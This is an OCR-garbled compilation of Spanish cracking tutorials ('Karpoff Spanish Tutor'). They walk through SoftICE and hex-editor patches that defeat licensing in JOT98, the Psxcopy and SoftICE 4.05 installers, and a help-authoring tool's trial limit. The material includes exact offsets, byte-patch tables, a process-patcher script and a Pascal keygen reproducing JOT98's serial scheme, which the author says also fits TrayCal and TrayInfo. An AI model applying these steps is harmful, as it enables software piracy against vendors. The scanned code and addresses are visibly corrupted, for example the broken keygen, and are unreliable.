Ahora tenemos dos opciones modificar con el editor hexa el archivo jot98_un o utilizar un 
launcher para parchear en memoria el archivo original, como no tengo nada mejor que hacer voy ha 
hacerlo de las dos maneras. Pero lo primero vamos al direcctorio donde tenemos el programa 
instalado y hacemos una copia del archivo jot98.val 


Modificar con el editor hexa: 


Abrimos el archivo (recordad el jot98_un) en el editor hexa, buscamos el Offset 5458A y le 
metemos 909090909090. Lo guardamos y a probar. Ejecutamos, le metemos los datos y 
¡¡Congratulations!!, reiniciamos el programa y seguimos registrados, ya está. 


Si comparamos el archivo jot98.val actual con la copia que hemos hecho antes podemos comprobar 
que se han modificado unos numeritos, y si ponemos el archivo que hemos guardado antes en lugar 
del nuevo, volveremos a no registrado. Antes de volver a no registrado, hacemos una copia del 
archivo actual, por ejemplo le llamamos jot98regl.val. 


Con R!SC's Process Patcher v1.5 


Podéis utilizar el que queráis, yo voy a utilizar el R!SC's Process Patcher v1.5 . Abrimos un 
editor de texto, y siguiendo la ayuda, que para eso está, escribimos lo siguiente: 


¿jot98.rpp <--- Nombre del archivo que vamos ha crear en el editor de texto 
O=jo098.exe: ¡; <-- El launcher que va a crear el R!SC's 

F=jot98.exe: ; < Nuestro objetivo 
P=45458A/0F,85,4c,02,00,00/90,90,90,90,90,90: ; <-- Lo que cambiamos 

55 


Lo guardamos como jot98.rpp, ejecutamos el R!SC's, seleccionamos jot98.rpp damos a abrir y ya 
tenemos nuestro launcher (jo98.exe). Lo copiamos, lo llevamos a la carpeta del jot98, lo 
ejecutamos metemos los datos que queramos (recomiendo distintos de los anteriores) y ya está. 


3” Una curiosidad: 


Aunque esto ya está terminado, vamos a ver una curiosidad: 


Si comparamos el archivo jot98.val actual con las copias que hemos hecho antes podemos comprobar 
lo siguiente: 


- Archivo original: Spaeder5323223415601010812278 


- Parece que se modifican estos números, que tendrán que ver con nuestro código :-o Además las 
dos 'secuencias' válidas empiezan por Spaeder25. Si alguien lo traduce que me lo diga. 


4% Una de serial: 


Con todo lo que hemos hecho antes está 'chupao'. Si no tenemos cargado el Softice, 
reiniciamos..... 


Ejecutamos el programa metemos el nmbre (KuaTo_ThoR), el código (999888777) y antes de darle 
vamos al Sofice (Ctrl1+D), y como no tengo ganas de equivocarme meto un bpx hmemcpy (conviene 
tener cerrados todos los programas, sino va a saltar por cualquier cosa.) volvemos a Windows, le 
damos a ok y a Sofice. 


Aparecemos en User (línea verde), lo primero quitamos el break (bc0), luego pulsamos F12 hasta 
aparecer en JOT98!.shrink. Como ya sabemos donde tenemos que ir (ver principio apartado 2%), 
escribimos bpx 454585, damos Ctrl+D y aparecemos en Softice, escribimos d eax y sale nuestro 
código, escribimos d edx y sale JT98R7604K. Damos F5, metemos los datos correctos y ya está. 


He repetido esto varias veces y he sacado las siguientes conclusiones: 


- El código es de tamaño 10 


- JT98 es fijo. 


- La Ultima letra (K) es la inicial de nuestro nombre en mayusculas y el 4 anterior es fijo. 


- El 76 también es fijo. 


- La antepenúltima cifra (0) es la longitud de nuestro nombre (si es de diez o más 0). 


- La Res la última letra de nuestro nombre (en mayúsculas). 


Con esto el generador está servido jeje. Ahí va un pequeño programilla en Pascal: 


program keygen; 

uses Ccrt; 

var 

a,b,c: char; 

cont:integer; 

begin 

clrsct; 

Writeln('Generador de claves para JOT98 por KuaTo_ThoR'); 
writeln; 

Write('Dame tu nombre: '); 
read(a); 


cont :=cont+1; 

until eoln; 

if cont>=10 then cont:=0; 
a:=Upcase la); 


b:=Upcase (b); 

writeln('Tu cédigo es: JT98',a,'76',cont,'4',b); 
readln; 

readln; 

end. 


Vaya, sin seguir una sóla línea de código, tenemos un Generador. Lo que no me explico, es que 
siendo el número de serie tan simple en el archivo JOT98.val cambie tantos números. 


5% Conclusiones finales: 


Bueno lo que me pregunto es si los demás programas de esta compañía están protegidos de igual 
manera. Yo he probado con el TrayCal v1.02 y está protegido igual excepto el archivo val que no 
lo tiene. Pero para el nombre 'felipito', el código es TCO7684F, la misma codificación que antes 
salvo que en lugar de JT98 aparece TC, sólo varían las iniciales del programa, que poca 
imaginación. Y pillé otro más, el TrayInfo v1.02, que para 'felipito' tiene el siguiente código: 


TI3207684F. (Estas versiones 1.02 han salido todas a granel de la factoría). Con esta as tu KEYG 


Programa: 


Karpoff Spanish Tutor 


Psxcopy 6.2 y Numega softice 4.05 


PROTECCION: Instalaciones saltandonos el Serial. 
Ds sspeiale Psxcopy: Programa para duplicar eds. 
Numega softice: Debuger para windows. 
Dificultad: Principiante +. 
3 ó Psxcopy: www.cdrsoft.net 
DOWNLOAD : 
Numega softice: http://welcome.to/karpoff 
Herramientas: Softice, W32dasm, Editor Hexadecimal 
CRACKER: 


Hola a todos. 


Fanega FECHA: 19/6/2000 


INTRODUCCION 


Ante todo decir que para seguir este tutorial ya se debe tener conocimiento del uso de las herramientas que arriba se 


menciona. 


Hoy vamos a ver dos tecnicas de proteccion que suelen usar bastantes programas durante el proceso de instalacion. La 
primera es el mismo instalador quien nos pide un password para continuar la instalacion en este caso es el InstallShield. 
La segunda es el programa que intentamos instalar quien nos pide el nombre, compañia y numero de serie. 


En los dos casos si no sabemos la contraseña o el numero de serie, no nos deja instalar el programa y ni siquiera nos deja 


probarlos. 


Como programas para ver como instalar programas sin saber el numero de serie utilizaremos estos dos: 


1” Psxcopy 6.2 


2” Numega Softice 4.05 


AL ATAKE 


Pxscopy 6.2 


Este es un programa de grabacion cuya utilidad es duplicar cds, hasta aqui llego no voy a alabar ni mucho menos las 
cualidades de este programa, simplemente porque esta gente es la que da mal nombre a los reversers, estos si que son 
CKACKERS de verdad, y digo todo esto por que se trata de una copia pirata de NTI CD COPY. Esta gente a cogido el 
programa y han cambiado todos los caption o sea los nombres de todas las ventanas, donde ponia Nti cd copy lo han 
cambiado por Pxscopy 6.2, pero todavia existen algunos errores. En la ayuda en algunas explicaciones todavia se ven 
algunas ventanas con Nti cd copy, y si habrimos con algun editor hexadecimal la imagen que crea el programa en el disco 
duro al grabar algun disco vemos claramente la palabra NTI al principio de la imagen, y todavia mas encima de crackearlo 
y ponerlo en la red, quieren que paguemos por el ¡que morro!. 


Vamos por faena, esta programa cuando intentamos instalarlo, antes de descomprimirse en el archivo temporal de 
windows nos pide una contraseña. 


InstallShield Self-extracting Exe 


attached files. 


A EU 


al Please enter the password required to extract the 


Metemos una contraseña facil de recordar por ejemplo:123456, le damos a ok y nos muestra un mensaje de error. 


InstallShield Self-extracting EXE 


You have entered an incorrect password, 


Si le damos a aceptar el programa se cierra por completo. Vamos a intentar pasar esto como no sabemos la contraseña 
utilizaremos nuestras armas. Arrancamos otra vez el programa y en la ventana anterior a la que nos pide el password 
pulsamos ctrl+d y entramos en el sice ahora tenemos que meter algun breakpoint para que salte el sice antes de enseñarnos 
la ventana del password, yo normalmente siempre empiezo por poner los tipicos, pongamos por ejemplo bpx 
messageboxa, bpx dialogboxparama, y bpx getwindowtexta salimos del sice pulsando FS, y bingo hemos tenido suerte con 
uno de los breakpoints concretamete con bpx dialogboxparama, miremos detenidamente la ventana del sice y fijemonos en 
las letras verdes pone algo asi como Kernel etc. Este no es el programa que estamos usando pulsamos F12 se cierra el sice 
y salta la ventana de password, metemos alguna contraseña al azar y pulsamos ok de repente el sice se vuelve a abrir y 
caemos aqui: 


:00401ED5 2D32060000 sub eax, 00000632----Caemos aqui------ 
:00401EDA EB10 jmp 00401EEC 

:00401EDC 68B0C74000 push 0040C7B0 

:00401EE1 6810C84000 push 0040C810 

:00401EE6 FF1580E24000 Call dword ptr [0040E280] 
:00401EEC 83F801 cmp eax, 00000001 

:00401EEF 1BCO0 sbb eax, eax 

:00401EF1 F7D8 neg eax 

:00401EF3 C3 ret 


Debemos tener un poco de paciencia, e ir mirando de vez en cuando que es lo que llevan los registros, en este punto por 
ejemplo si ponemos en el sice d edi y nos situamos con el raton sobre la ventana de datos y la desplazamos un poco hacia 
abajo tenemos una grata sorpresa en mi ordenador concretamente en la posicion de memoria 0167:0040C7BO0, pero como 
el objetivo que nos habiamos fijado era instalar el programa sin el password dejamos el numerito en paz y continuamos 
con lo nuestro, fijate en eax que es igual a O y ve pulsando F10 despues de que el programa haga una serie de operaciones 


con eax lo pone otra vez a 0, y llegamos a la posicion 004025CE 


:004025C7 ESD6FSFFFF call 00401EA2---llama a las rutinas de comprobacion---- 
:004025CC 85CO0 test eax, eax 

:004025CE 7507 ¡ne 004025D7--Salta si es correcto----- 

:004025D0 BOFES mov al, FS 

:004025D2 E96C050000 ¡mp 00402B43 

:004025D7 833D38B0400000 cmp dword ptr [0040B038], 00000000 

:004025DE 751A jne 004025FA 


En este punto regresamos de la llamada a las rutinas de comprobacion, siguiente linea comprueba eax y en la siguiente si 
eax es igual a O no salta y si es diferente de 0 si que salta. 


Aqui podemos hacer dos cosas, si eliminamos el call 00401EA2 nunca nos enseñara la ventana de introducir password y 
seguiria perfectamente la instalacion, pero como ya estamos en la linea 004025CE cambiamos el salto ¡ne por un ¡mp asi 
saltaremos y continuara la instalacion. 


En el sice pon a pulsa enter aparecera 015f:004025CE pon ¡mp 004025D7 y pulsa dos veces enter, ahora pulsamos E3 y 
continuamos la instalacion, cuando pasen un par de ventanas nos aparecera la tipica ventana que nos pregunta el nombre, 
compañia y numero de serie, no te preocupes ya que los piratas se encargaron de crackear esto, puedes poner lo que 
quieras, pulsa Ok y pasa la ventana, aqui nos detenemos y pensamos hemos hecho el cambio en memoria pero no en el 
codigo del programa, cuando vuelva a instalar el programa si no cambio el salto en el programa me volvera a pedir el 
password, pero podemos hacerlo de otra manera como el password me lo pide el installshield antes de descomprimir el 
programa si recojo el programa descomprimido del archivo temporal de windows y lo guardo cuando quiera volverlo a 
instalar no me saldra mas la ventana del password. 


Veamos como hacer esto, minimiza la ventana en la que estas y busca la carpeta temp en windows, hay que decir que 
conviene siempre tener el archivo temporal de windows limpio asi sabremos cuales carpetas son las que crea nuestro 
programa, por ejemplo en mi caso crea tres carpetas pero una sola contiene algo y es -ebx0001 que contiene tres carpetas 
mas Disk1, Disk2 y Disk3. como ya sabemos cual es la copiamos a otro sitio y le cambiamos el nombre, ya podremos 
instalarlo cuando queramos sin password. 


Numega Softice 4.05 


Hasta ahora tenia instalada la version 3.2 de este programa y decidi actualizarme, cual ha sido mi sorpresa al ver que no 
me dejaba instalar este programa si no tenia el numero de serie, pero hombre dejame por lo menos que te pruebe a ver si 
eres de mi agrado, pues nanai de la china. 


Bueno vamos a ver como nos apañamos para instalar el softice 4.05, para esto necesitaremos un debuger como yo ya tenia 
el softice 3.2 lo he hecho con este, pero si no tienes ninguno puedes utilizar el Trwin2000 que si te deja probarlo pero con 
limitaciones, he de decir que este ultimo me gustaria mas que el sice si no fuese por los bastantes cuelgues que provoca. 


Empecemos a instalar el sice 4.05 yo lo tengo en una sola carpeta llamada S1405w9x.exe tu a lo mejor lo tienes dividido 
en cuatro archivos comprimidos, lo primero que tienes que hacer es crear una carpeta y descomprimir el sice dentro de 
ella. Sin embargo si lo tienes como yo en un archivo autoejecutable no pinches con el boton izquierdo sobre el porque 
comenzara a instalarse, pincha con el boton derecho sobre el y en el menu que se abre pincha sobre extract to, le indicas la 
carpeta donde se tiene que descomprimir y aceptas. Ya estamos todos iguales con los mismos archivos, abrimos la carpeta 
que hemos creado buscamos setup.exe pinchamos dos veces sobre el y el programa se empieza a instalar, cuando 
lleguemos a la ventana que nos pide el nombre, compañia y numero serie, paramos no porque nos apetezca, sino por que si 
rellenamos las casillas y le damos a Next nos manda un mensaje de error, ¿que podemos hacer? podemos buscar el 
numero de serie valido o intentaremos pasar esta ventana sin mas, vamos a ver la segunda opcion.. 


Volvemos a la ventana anterior pulsando sobre Back, abrimos el sice Ctrl+d y ponemos un breakpoint Bpx 
dialogboxparama este ultimamente me funciona muy bien, le damos a ES para salir del sice y pulsamos Next en la ventana 
de licencia del programa que intentamos instalar, de repente salta el sice pulsamos F12 y aparece la ventana del numero de 
serie, introducimos los datos que nos pide y le damos a Back ¡ojo! he dicho a Back (retroceder en español) y no a Next, 
vuelve a saltar el sice y ya estamos donde queriamos. Cual es el motivo de retroceder y no de avanzar, simplemente 


porque queremos saber donde se hace la llamada a la ventana de registro y saltarnosla, tambien podriamos avanzar pero 
esto lo hacemos siempre, intentar cazar el mensaje de error y luego cambiar un salto precedente para que no nos 
encontremos con el, pero hoy aremos que ni siquiera nos pregunte nombre ni numero de serie. 


Fijemonos en la ventana del sice, en las letras verdes que hay debajo de la ventana de codigo pone Nminst32, ahora mira 
en al ultima linea del sice donde pone Enter a command (H for help) al final de esta linea se ve otro nombre _ins3576, este 
viene a ser el directorio padre el que maneja toda la instalacion y va llamando a librerias y otros archivos, el siguiente paso 
es regresar a el y ¿como? pulsando F12 mira si es facil, despues de pulsar F12 aparecemos aqui: 


:0042A309 FFB580FBFFFF push dword ptr [ebp+FFFFFB80] 

:0042A30F FFB58CFBFFFF push dword ptr [ebp+FFFFFB8C] 

:0042A315 FFB598FBFFFF push dword ptr [ebp+FFFFFB98] 

:0042A31B FFS5CO0 call [ebp-40]----Salto a la ventana de registro------- 

:0042A31E 898570FBFFFE mov dword ptr [ebp+FFFFFB70], eax--estamos aqui----- 
:0042A324 E95B010000 ¡mp 00424484 


Si nos fijamos en la linea superior de donde estamos vemos que es una llamada de la cual acabamos de regresar, esta es la 
llamada que hace aparecer la ventana de registro, podemos quitarla a ver que pasa. 


Primero quitamos los breakpoints que teniamos bc * y luego ponemos otro en esa llamada bpx 0042A31B pulsamos ES y 
regresamos a la ventana de License Agreement en esta ventana pulsamos sobre Yes y saltamos a nuestro bpx en el sice, 
vamos a cambiar la llamada por nada, ponemos a en el sice y aparece 


015f:0042A31B ponemos un NOP pulsamos enter y aparece 

015f:0042A31C ponemos NOP ya sabes enter 

015f:0042A31D ponemos otro NOP dale a enter 

015f:0042A31E y enter, pulsamos ES y ya esta, hemos saltado la ventana donde nos pide el numero de serie y 
continuamos la instalacion perfectamente sin ningun problema, incluso el programa despues funciona bien. 


Ahora nos queda meter el parche en el codigo, sabemos que tenemos que buscar el archivo _ins5576 por lo tanto vamos al 
directorio de donde estamos instalando el sice y vemos que no esta hay, pues vamos a buscarlo siguiendo estos pasos - 
Barra de inicio-Buscar-Archivos o carpetas ponemos el nombre y le damos a buscar, sorpresa no esta por ninguna parte 
del ordenador, ¿tendre algun virus que me hace desaparecer los archivos? la respuesta es no, este archivo es creado 
durante la instalacion del sice en la carpeta de archivos temporales de windows y cuando termina la instacion lo borra, 
entonces ¿como podemos parchearlo si no existe? para esto podemos crear un loader que lo parchee en memoria cuando 
este en ejecucion, yo personalmente he intentado crear un loader con tres programas diferentes y no me aplica el parche en 
ninguna ocasion, esto no se si se debe a algun error mio creando el loader, o es que el loader no aplica bien el parche por 
que el archivo a parchear no es el ejecutable principal. 


En este punto he de decir que estuve a punto de terminar este manual, ya sabia como instalar el programa sin conocer el 
numero de serie pero no sabia como parchear el codigo para cuando volviese a instalarlo no tuviera que volver a utilizar el 
sice, pero se me ocurrio una idea algo descabelleda para mis conocimientos pero que entra mas puramente si cabe en la 
filosofía de la ingenieria inversa, destripar los programas y hacerlos funcionar como a nosotros nos plazca. 


A ver si me se explicar correctamente, cuando ejecutamos setup.exe el programa sigue los siguientes pasos crea unos 
archivos temporales por todo el sistema luego crea un directorio en la carpeta de archivos temporales de windows 
Cistmpl.dir) para crear tres archivos dentro de esa carpeta (_ins3576._mp, _wtl951.d1l, zdataS1.dll), luego pasa el control 
a un archivo de esa carpeta (_ins5576._mp) que es el encargado de continuar descomprimiendo archivos y realizar la 
instalacion y al finalizarla se borran todos los archivos temporales. 


La idea es la siguiente podriamos cazar los archivos temporales y meterlos en la carpeta donde esta setup.exe y parchear el 
archivo _ins5576._mp para que no salga la ventana de registro y luego hacer que el programa busque este archivo, pero 
para hacer esto primero tendremos que evitar que el programa cree estos archivos y evitar tambien que se descomprima en 
ellos por que nos chafara nuestro crack y finalmente que no borre estos archivos cuando finalice la instalacion ya que en 
teoria son temporales, me ha costado pero lo he conseguido. 


Primero cazaremos los archivos temporales, para ello la carpeta windowstemp tiene que estar vacia, ahora vamos a 
instalar el sice pulsamos sobre setup.exe primero aparece la ventanita de descompresion, cuando finalice sale la ventana 


azul que nos tapa toda la pantalla, aqui no le damos a ningun boton y minimizamos la ventana entonces nos vamos a 
ciwindowsttemp y abrimos el directorio _istmp1.dir vemos los tres archivos que antes he dicho y otra carpeta _istmp0.dir 
esta carpeta la borramos por que no nos hace falta y ocupa mucho, salimos de la carpeta que estamos y la copiamos dentro 
de la carpeta desde donde estamos instalando el sice y haz otra copia donde quieras por si te equivocas y la instalacion nos 
borra estos archivos, cierra la instalacion que estabamos haciendo, y veras como los archivos de la carpeta temp 
desaparecen pero los que nosotros hemos copiado no, ya los hemos cazado. 


Segundo paso parchear el archivo _ins5576._mp, abramoslo con el w32dasm ¿como que no sabes donde esta? mira dentro 
de la carpeta que acabamos de copiar, buscamos la direccion parchear que es 0042A31B y miramos su offset 2971B 
cerramos el w32dsam y abrimos _ins5576._mp con algun editor Hexadecimal, buscamos el offset 2971B y cuando 
aparecezca el cursor cambiomos los tres primeros Bytes por tres 90, para quitar la llamada a la ventana de registro. 


Tercer paso redirigir la instalacion a nuestros archivos, parece complejo pero no lo es, solo tenemos que decirle cuando 
vaya a crear el directorio de los archivos temporales _istmp1.dir que no lo cree en c:1windowstemp si no en donde 
tenemos el nuestro yo por ejemplo lo tengo en c1windowescritoriolsoftice asi que vamos a ello, carguemos con el loader 
del sice setup.exe cuando pare en el inicio del programa ponemos este breakpoint bpx createdirectorya pulsamos FS y 
saltara el sice en nuestro breakpoint pulsamos F12 y ya estamos en la rutina que crea el directorio, de momento esta rutina 
no nos interesa queremos ir donde el programa da la ruta c1windowsWemp para que se creen los archivos temporales, 
pulsamos F12 y caemos en: 


:00405FOC inc ebx--Incrementa ebx en 1 cada vez que no se haya podido crear el directorio para cambiarle el nombre ej: 
_istmpl1.dir, _istmp2.dir, _istmp3.dir etc.---- 

:00405FOD lea eax, [ebp-010C]---Pone c1windowstemp en eax 

:00405F13 push ebx 

:00405F14 push eax 

:00405F 15 lea eax, [ebp-0214]---Direccion donde pondra el programa la ruta donde crear _istmp%.dir en este caso 
cAwindowstemp ------ 

:00405F1B push 0040F400---lleva el nombre del directorio _istmp%.dir----- 

:00405F20 push eax 

:00405F21 Call USER32.wsprintfA--Pone en la ruta el nombre del directorio c:1windowsWtempl istmp%.dir ------=--- 
:00405F27 add esp, 00000010 

:00405F2A lea eax, [ebp-0214]--Pone en eax la ruta c1windowsWtempl_istmp%.dir ----- 

:00405F30 push eax 


:00405F38 pop ecx 

:00405F39 ¡ne 00405FOC--Salta hacia arriba si no puede crear el directorio----- 
:00405F3B lea eax,[ebp-0214]---carga cAwindowsttempl_istmp%.dir en eax ------ 
:00405F41 push eax 

:00405F42 lea eax, [ebp-010C]---carga c:1windowsttemp en eax -------- 
:00405F48 push eax 

:00405F49 Call KERNEL32.IstrcpyA---copia [ebp-0214] en [ebp-010C] ------ 
:00405F4F lea eax, [ebp-010C]---- carga c:lwindowstempl_istmp%.dir------ 
:00405F55 push eax 

:00405F36 call 0040634B--Llamada a rutinas que crean archivos---- 
:00405F3B pop ecx 

:00405F5C lea eax,[ebp-010C]---- carga c:lwindowsttempl istmp%.dir------ 
:00405F62 push eax 

:00405F63 call 00405171---creando mas archivos---- 

:00405F68 mov esi, eax 

:00405F6A pop ecx 

:00405F6B test esi, es1---comprueba esi------ 

:00405F6D jne 00405F83---Salta si no ha podido crear archivos----- 
:00405F6F lea eax, [ebp-010C]---- carga c:lwindowsttempl_istmp%.din_ins5576._mp ---- 
:00405F75 push 00000001 

:00405F77 push eax 

:00405F78 call 004060D9---Descomprime en la ruta especificada------ 
:00405F7D pop ecx 


:00405F7E test eax, eax 
:00405F80 pop ecx 


Lo primero que debemos hacer es quitar el bpx que teniamos bc * y poner uno donde empieza todo el embrollo bpx 
00405FO0D, salimos del sice con F3 y cerramos la instalacion cuando podamos, volvemos a empezar otra vez ya sabes 
setup.exe y salta el sice en el bpx que hemos puesto si ponemos d ebp-010c veremos en la ventana de datos 
ciwindowsWtemp que es la ruta donde se va a crear todo el embrollo, como lo que nosotros queremos es meter la direccion 
donde tenemos nuestro directorio con el archivo parcheado, vamos a buscarla en la ventana de datos desplazala un poco 
hacia abajo y pronto veras la ruta desde donde estas instalando el programa en mi caso c:1windowstescritoriolsoftice y la 
tengo en la posicion de memoria 0064FBO0O0, pero como esta direccion en otros ordenadores puede no ser la misma tengo 
que poner algo que funcione en todos los ordenadores, por ejemplo ebp-010c es igual a OO64FAF4 que lleva 
ciwindowstemp entonces 0064FB0O0 que lleva c:lwindowstescritoriolsoftice es igual a ebp-0100, te lo explico mejor 
0064FB00-0064FAF4= 12 bytes de diferencia por lo tanto 10C-12= 100 Ok. Entonces en la linea 00405FOD lea eax, [ebp- 
010C] hay que poner 00405FOD lea eax, [ebp-0100], ve mirando los bytes como cambian para despues parchear el codigo. 


Tercer paso engañar al programa para que crea que es su directorio y no el nuestro. 

Ahora todavia no se cargan nuestros archivos, por que el programa al intentar crear el directorio se encuentra con el 
problema de que ya existe uno que es el nuestro, y vuelve otra vez a intentarlo, coge _istmpl.dir que ya existe y sube el 
numero que hay en el nombre, asi sucesivamente hasta que pueda crear un directorio ejemplo: _istmp1.dir, _istmp2.dir, 
:Istmp3.dir etc. ¿como evitar esto? esto lo sabemos de sobra, cuando haga la comprobacion le cambiamos lo que sea para 


que siga el buen camino, en la linea que llama a rutina de creacion del directorio 00405F31 call 0040C9BO pulsamos F8 y 
entramos en la rutina. 


:0040C9B0 mov eax, dword ptr [esp+04] 

:0040C9B4 push 00000000 

:0040C9B6 push eax 

:0040C9B7 Call : KERNEL32.CreateDirectoryA---Crea directorio--- 
:0040C9BD test eax, eax 

:0040C9BF jne 0040C9C0----Salta si ha podido crear el directorio--- 
:0040C9C1 Call : KERNEL32.GetLastError--error si no crea el directorio--- 
:0040C9C7 jmp 0040C9CB 

:0040C9C09 xor eax, eax 

:0040C9CB test eax, eax 

:0040C9CD je 0040C9DC 

:0040C9CF push eax 

:0040C9DO0 call 0040C0BO 

:0040C9DS add esp, 00000004 

:0040C9D8 or eax, FEFEFFFEFF 

:0040C9DB ret 

:0040C9DC xor eax, eax 

:0040C9DE ret 


Aqui vemos que despues de ir a la funcion Createdirectory hace una comprobacion con eax, y luego salta si ha podido 
crear el directorio o por el contrario sigue si no ha podido crearlo. En este salto es donde vamos a atacar 0O40COBF jne 
0040C9C9 lo cambiamos por 0040C9BF je 0040C9CO9 y el programa ya cree que ha sido el quien ha creado el directorio 
por el contrario es nuestro directorio el que lleva. 


Cuarto paso evitar que se descomprima encima de nuestros archivos y cuando termine la instalacion no nos borre nuestros 
archivos temporales.. 

Aqui tenemos que evitar que el programa se descomprima por que la ruta que lleva es la nuestra y lleva nuestros archivos 
si se descomprime encima nos jode el invento por que desaparecia el parche que antes hemos hecho y seria una instalacion 
normal. Estabamos en la rutina que crea el directorio, pulsamos F12 para salir de ella y vamos pulsando FLO hasta llegar 
aqui 


:00405F63 call 00405171---creando mas archivos---- 

:00405F68 mov esi, eax 

:00405F6A pop ecx 

:00405F6B test esi, esi---comprueba esi------ 

:00405F6D jne 00405F83---Salta si no ha podido crear archivos----- 


:00405F6F lea eax, [ebp-010C]---- carga c:windowstempl istmp%.dir_ins5576._mp ---- 

:00405F75 push 00000001 

:00405F77 push eax 

:00405F78 call 004060D9---Descomprime en la ruta especificada------ 

Revisamos esta parte de codigo que en definitiva viene a decir que si no puede crear el archivo _ins5576._mp salte las 
rutinas de descompresion, esto es lo que buscabamos cambiamos este salto y ya no pasamos por la rutinas de 
descompresion, todavia no lo hagas porque tenemos un problema, supongamos que hemos hecho el cambio y no pasamos 
por las rutinas de descompresion y no nos chafa nuestro parche, muy bien el programa se instala sin pedirnos el numero de 
serie pero cuando termina la instalacion nos borra nuestros tres archivos y el directorio, ¿que hacer para que no nos los 
borre? hay dos soluciones poner un bpx deletefilea para ver cuando se borran los archivos, u otra muy facil que nos la 
ofrece windows. A los tres archivos que tenemos dentro de nuestro directorio les cambiamos las propiedades de 
modificado a solo lectura y ya no los borrara, ¿y que tiene que ver esto con el salto anterior? muy simple al igual que si no 
puede borrar los archivos tampoco los puede modificar o sea que cuando intente crearlos no podra chafarlos y devolvera 
esi como que no pudo crear los archivos y el salto se ejecutara sin pasar por las rutinas de descompresion. Ya lo tenemos 
todo hecho solo queda hacer los cambios en setup.exe estos son los datos para los cambios. 


¡Code Data ¡Offset | Bytes actuales | Bytes nuevos 
00405FOD [530D [8D85F4FEFFFF [8D8500FFFFFF 
10040C9BF [BDBF | 75 | 74 


Y no te olvides de cambiar las propiedades de los archivos. 
Para finalizar decir que hay formas mas faciles de hacerlas pero lo que cuenta es aprender. 
PD: Perdon por las faltas de ortografía, pero mi nivel cultural no pasa de 6” de EGB. 


Un saludo para toda la peña española. 
Por Fanega. 


Karpoff Spanish Tutor 
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INTRODUCCION 


Bueno amigos este es mi 5to. tutorial, este es de un Sharewarecito que verdaderamente 
esta mono, tiene las 

propiedades de crear ayudas para tus programas ya sea WinHelp 32 Hmtl Help y tambien 
la creacion de manuales 

electronicos los cuales con tansolo un click puedes mandarlo a imprimir, 
verdaderamente lo use unos cuantos minutos y 

me parecio una buena utileria. 


AL ATAKE 


Bueno amigos !!EMPECEMOS CON ESTE MENJURGE !!! como siempre lo primero es instalar el 
programa y ver 

que tipo de limitaciones tiene, para empesar cuando ejecutas el H8M lo primero que te sale 
es 


thenextgenerationinhelp-authoóoring 
http4/www_eL-softwafe-Ccom 


Wersion: 2.6.0 
Build: 1161 
Language: English 


Unregistered 
evaluation copy 


Sesion for WindowsI5 € VITRO YS IN 


Order info | 
Evaluation period expired 


una ventana diciendote que tienes 14 dias para evaluarlo y dos botones uno de OK y otro de 
ORDER INFO, dentro de 


esa misma ventana viene un texto que dice !! 14 DAYS FOR EVALUATION PERIOD !!! bueno, si das 
click en OK 
se va directamente a abrir el programa !!!'mmmmmmmm!!! como podemos deducir este programa es 


una version demo 
la cual no tiene ningun apartado para insertar un serial solo tiene las siguientes 
protecciones 


1.NAG SCREEN 
2.LIMITE DE TIEMPO 
3.UN STRING QUE APARECE AL SER COMPILADO UN PROYECTO 


entonces manos a la obra a quitar esas protecciones, que les parece si empezamos con el 
limite de tiempo OK!! lo primero 

sera darle una ojeada con el Soft Ice, para eso cargamos el Soft Ice y nos vamos a Symbol 
Loader y seleccionamos el 

ejecutable del HéM 


* NuMega SoftlCE Symbol Loader al ES 
File Edit Module Help 


agave | eras Y al el 44 4) 


cd SoftICE is active ¿/ 


despues de seleccionarlo damos click o E, nos manda una ventana de a ocurrido un error 
damos click en la opcion donde 

esta el si y saltamos directamente al Soft Ice bueno desde ahi nos vamos dando F10 hasta que 
nos aparesca la Nag Screen y 

damos OK en la Nag Screen y saltamos otra vez al Soft Ice y damos otra vez F10 unas tres 
veces mas y nos encontramos con 

un salto JGE en la direccion de memoria 54b601 y unas lineas mas arriba nos encontramos con 
un CALL en la dirección de 

memoria 54b5f6 quiero comentarles que las direcciones de memoria pueden ser diferentes eh!!! 
, bueno 

continuemos. 


Como pueden ver este salto y esa call son muy sospechosas mmmm!! bueno ahora lo que tenemos 
que hacer es 

probar si ese salto es el que contador de tiempo que les parece si ahora desensamblamos el 
ejecutable de el HéM 

con el Win32dasm y tendremos que esperar un poco ya que es grande el ejecutable , bueno en 
lo que desensambla. 

vean algunos de los diferentes saltos concionales e incondicionales que existen: 


77 cl JA rel8 Salto corto si encima de (CF=0 y ZF=0) 

73 clk JAE rel8 Salto corto si encima de o igual (CF=0) 

72 clk JB rel8 Salto corto si debajo de (CF=1) 

76 clk JBE rel8 Salto corto si debajo de o igual (CF=1 o ZF=1) 
72 cb JC rel8 Salto corto si lleva (CF=1) 

E3 cb JCXZ rel8 Salto corto si el registro CX es 0 


E3 clk JECXZ rel8 Salto corto si el registro ECX es O 

74 clk JE rel8 Salto corto si igual (ZF=1) 

7F cb JG rel8 Salto corto si mayor (ZF=0 y SF=0F) 

7D cb JGE rel8 Salto corto si mayor o igual (SF=0F) 

7C cb JL rel8 Salto corto si menor (SFOF) 

7E cb JLE rel8 Salto corto si menor o igual (ZF=1 o SF<>0F) 
76 cb JNA rel8 Salto corto si no encima de (CF=1 o ZF=1) 
72 cb JNAE rel8 Salto corto si no encima de o igual (CF=1) 
73 ck JNC rel8 Salto corto si no carry (CF=0) 

75 cb JNE rel8 Salto corto si no igual (ZF=0) 

7E cl JNG rel8 Salto corto si no mayor (ZF=1 o SF<>O0F) 

7C cb JNGE rel8 Salto corto si no mayor o igual (SF<>OF) 
7D cb JNL rel8 Salto corto si no menor (SF=0F) 


7F cb JNLE rel8 Salto corto si no menor o igual (ZF=0 y SF=0F) 

71 cb JNO rel8 Salto corto si no overflow (OF=1) 

7B clk JNP rel8 Salto corto si no paridad (PF=1) 

79 cl JNS rel8 Salto corto si no signo (SF=0) 

75 cb JNZ rel8 Salto corto si no cero (ZF=0) 

70 cb JO rel8 Salto corto si overflow (OF=1) 

7A cb JP rel8 Salto corto si paridad (PF=1) 

7A cb JPE rel8 Salto corto si la paridad igual (PF=1) 

7B cb JPO rel8 Salto corto si la paridad impar (PF=0) 

78 cb JS rel8 Salto corto si signo (SF=1) 

74 cb JZ rel8 Salto corto si cero (ZF=0) 

0F 87 cw/cd JA rel16/32 Salto cercano si encima de (CF=0 y ZF=0) 

0F 83 cw/cd JAE rel16/32 Salto cercano si encima de o igual (CF=0) 

0r 82 cw/cd JB rel16/32 Salto cercano si debajo de (CF=1) 

0F 86 cw/cd JBE rel16/32 Salto cercano si debajo de o igual (CF=1 o ZF=1) 
